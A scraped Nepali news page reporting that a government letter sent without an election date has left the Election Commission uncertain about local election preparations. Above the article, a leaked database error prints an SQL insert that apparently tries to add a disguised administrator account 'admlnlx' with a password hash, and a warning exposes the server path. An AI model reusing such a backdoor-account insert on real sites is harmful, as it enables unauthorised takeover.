WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3Kes.8/yC02/OQlf8SyTzC.ih73cv/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 07:21:13', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
सरकारको पत्रले निर्वाचन आयोग झन् अन्योलमा – Gaule Khabar

सरकारको पत्रले निर्वाचन आयोग झन् अन्योलमा

सरकारको पत्रले निर्वाचन आयोग झन् अन्योलमा

काठमाडौं, माघ २३- 

स्थानीय निर्वाचन तयारीका लागि सरकारले पठाएको पत्रले निर्वाचन आयोग झन् अन्योलमा परेको छ । मन्त्रिपरिषद्को बिहीवार बसेको बैठकले स्थानीय तहको निर्वाचनका लागि आवश्यक तयारी गर्न आयोगलाई पत्र पठाउने निर्णय गरेको थियो ।

आयोगले आफ्नो तर्फबाट सधैं निर्वाचन सम्बन्धी काम गरिरहेकै हुने भन्दै आयोगका सचिव गोपीप्रसाद मैनालीले मिति घोषणा नगरी ‘आवश्यक तयारी गर्नू’ भनी आएको पत्रमा केही अस्पष्टता रहेको लोकान्तरलाई बताए । सरकारले निर्वाचन गर्ने भनी प्रतिबद्धता जनाएपनि निर्वाचनका सम्बन्धमा आयोगलाई पठाइएको पत्रले काम गर्ने सन्दर्भमा आयोगलाई केही अस्पष्ट बनाएको उनको भनाइ छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका